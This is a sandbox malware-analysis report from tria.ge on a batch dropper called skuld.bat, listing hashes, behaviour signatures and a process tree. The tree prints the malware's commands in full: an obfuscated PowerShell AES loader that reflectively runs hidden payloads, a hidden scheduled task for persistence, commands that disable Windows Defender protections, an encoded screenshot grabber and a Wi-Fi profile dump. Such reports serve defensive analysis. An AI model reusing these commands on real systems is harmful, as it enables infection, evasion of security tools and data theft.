Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    144s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/06/2024, 22:47

General

  • Target

    skuld.bat

  • Size

    13.0MB

  • MD5

    441100cf63c807c0d4f359c64499ffa6

  • SHA1

    f65d189e9d35cef146f7e04b603032123f931691

  • SHA256

    70fdc6e91d6f0b7a3e72638bda9333eabb83a949e38216d52952629f98b1317c

  • SHA512

    de0352fad3f2df48638036052a29173328ca1a3ab119b2707ae982833914685f7088b9d4cbcbe2eb7f2a8270c76e3731c1d854568112c0c8d41b89b54c7b2d43

  • SSDEEP

    49152:KSOtTyTd7XtPt/Ws8crF3fLk3ReLdn5vq/5cQSo33D0gaHmCFMaXmwKbiifdT+td:Kw

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Drops file in System32 directory
    • Modifies registry class
    PID:792
    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
      2⤵
        PID:2236
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
        2⤵
          PID:4344
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
          2⤵
            PID:3996
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:3092
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              2⤵
                PID:4088
              • C:\Windows\system32\BackgroundTransferHost.exe
                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                2⤵
                  PID:4408
                • C:\Windows\system32\BackgroundTransferHost.exe
                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                  2⤵
                    PID:2660
                  • C:\Windows\system32\backgroundTaskHost.exe
                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                    2⤵
                      PID:2580
                    • C:\Windows\system32\BackgroundTransferHost.exe
                      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      2⤵
                        PID:3448
                      • C:\Windows\system32\BackgroundTransferHost.exe
                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        2⤵
                          PID:2148
                        • C:\Windows\system32\backgroundTaskHost.exe
                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                          2⤵
                            PID:1484
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k RPCSS -p
                          1⤵
                            PID:912
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            1⤵
                              PID:964
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                              1⤵
                                PID:760
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                1⤵
                                  PID:1048
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                  1⤵
                                    PID:1056
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                    1⤵
                                      PID:1124
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                      1⤵
                                        PID:1136
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                        1⤵
                                        • Drops file in System32 directory
                                        PID:1192
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                        1⤵
                                          PID:1224
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                          1⤵
                                            PID:1280
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                            1⤵
                                              PID:1348
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                              1⤵
                                                PID:1360
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1432
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                  1⤵
                                                    PID:1440
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                    1⤵
                                                      PID:1548
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                      1⤵
                                                        PID:1572
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                        1⤵
                                                          PID:1688
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                          1⤵
                                                            PID:1704
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                            1⤵
                                                              PID:1764
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                              1⤵
                                                                PID:1804
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                1⤵
                                                                  PID:1848
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                  1⤵
                                                                    PID:1912
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    1⤵
                                                                      PID:1920
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                      1⤵
                                                                        PID:2008
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                        1⤵
                                                                          PID:2028
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                            PID:2124
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                            1⤵
                                                                              PID:2172
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                              1⤵
                                                                                PID:2192
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                1⤵
                                                                                  PID:2340
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                  1⤵
                                                                                    PID:2436
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                    1⤵
                                                                                      PID:2440
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                      1⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:2608
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                      1⤵
                                                                                        PID:2676
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                        1⤵
                                                                                          PID:2700
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                          1⤵
                                                                                            PID:2708
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                            1⤵
                                                                                              PID:3160
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                              1⤵
                                                                                                PID:3272
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                1⤵
                                                                                                  PID:3392
                                                                                                • C:\Windows\Explorer.EXE
                                                                                                  C:\Windows\Explorer.EXE
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                  PID:3468
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skuld.bat"
                                                                                                    2⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:752
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stZnWL/BJJPlrN99l4yeGOrkttMQ+/54VlMbUM5NM4M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PQVNo8ckfwabMAQin5rKXA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qWOMa=New-Object System.IO.MemoryStream(,$param_var); $lRyQJ=New-Object System.IO.MemoryStream; $LFvXp=New-Object System.IO.Compression.GZipStream($qWOMa, [IO.Compression.CompressionMode]::Decompress); $LFvXp.CopyTo($lRyQJ); $LFvXp.Dispose(); $qWOMa.Dispose(); $lRyQJ.Dispose(); $lRyQJ.ToArray();}function execute_function($param_var,$param2_var){ $LTIrL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oWWac=$LTIrL.EntryPoint; $oWWac.Invoke($null, $param2_var);}$QKaab = 'C:\Users\Admin\AppData\Local\Temp\skuld.bat';$host.UI.RawUI.WindowTitle = $QKaab;$JqQNL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QKaab).Split([Environment]::NewLine);foreach ($RTGcd in $JqQNL) { if ($RTGcd.StartsWith('xoGbgXKYJsrxSGYofsbA')) { $dCeEd=$RTGcd.Substring(20); break; }}$payloads_var=[string[]]$dCeEd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                      3⤵
                                                                                                        PID:3024
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2784
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_226_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                          4⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2332
                                                                                                        • C:\Windows\System32\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.vbs"
                                                                                                          4⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3616
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.bat" "
                                                                                                            5⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4956
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('stZnWL/BJJPlrN99l4yeGOrkttMQ+/54VlMbUM5NM4M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PQVNo8ckfwabMAQin5rKXA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qWOMa=New-Object System.IO.MemoryStream(,$param_var); $lRyQJ=New-Object System.IO.MemoryStream; $LFvXp=New-Object System.IO.Compression.GZipStream($qWOMa, [IO.Compression.CompressionMode]::Decompress); $LFvXp.CopyTo($lRyQJ); $LFvXp.Dispose(); $qWOMa.Dispose(); $lRyQJ.Dispose(); $lRyQJ.ToArray();}function execute_function($param_var,$param2_var){ $LTIrL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oWWac=$LTIrL.EntryPoint; $oWWac.Invoke($null, $param2_var);}$QKaab = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_226.bat';$host.UI.RawUI.WindowTitle = $QKaab;$JqQNL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QKaab).Split([Environment]::NewLine);foreach ($RTGcd in $JqQNL) { if ($RTGcd.StartsWith('xoGbgXKYJsrxSGYofsbA')) { $dCeEd=$RTGcd.Substring(20); break; }}$payloads_var=[string[]]$dCeEd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                              6⤵
                                                                                                                PID:2564
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                6⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in Drivers directory
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:5004
                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                  attrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  7⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4076
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:3596
                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                  7⤵
                                                                                                                  • Views/modifies file attributes
                                                                                                                  PID:4028
                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                  wmic os get Caption
                                                                                                                  7⤵
                                                                                                                    PID:3992
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    wmic cpu get Name
                                                                                                                    7⤵
                                                                                                                      PID:1780
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                      7⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:3576
                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                      wmic path win32_VideoController get name
                                                                                                                      7⤵
                                                                                                                      • Detects videocard installed
                                                                                                                      PID:1088
                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                      wmic csproduct get UUID
                                                                                                                      7⤵
                                                                                                                        PID:2956
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                        7⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:3848
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                        7⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:3280
                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                        netsh wlan show profiles
                                                                                                                        7⤵
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:4508
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:3748
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0jtqo3d4\0jtqo3d4.cmdline"
                                                                                                                          8⤵
                                                                                                                            PID:4884
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp" "c:\Users\Admin\AppData\Local\Temp\0jtqo3d4\CSC688E2F43AC784A1891CECF9D3511AD41.TMP"
                                                                                                                              9⤵
                                                                                                                                PID:3156
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                1⤵
                                                                                                                  PID:3600
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                  1⤵
                                                                                                                    PID:5048
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:2932
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                      1⤵
                                                                                                                        PID:632
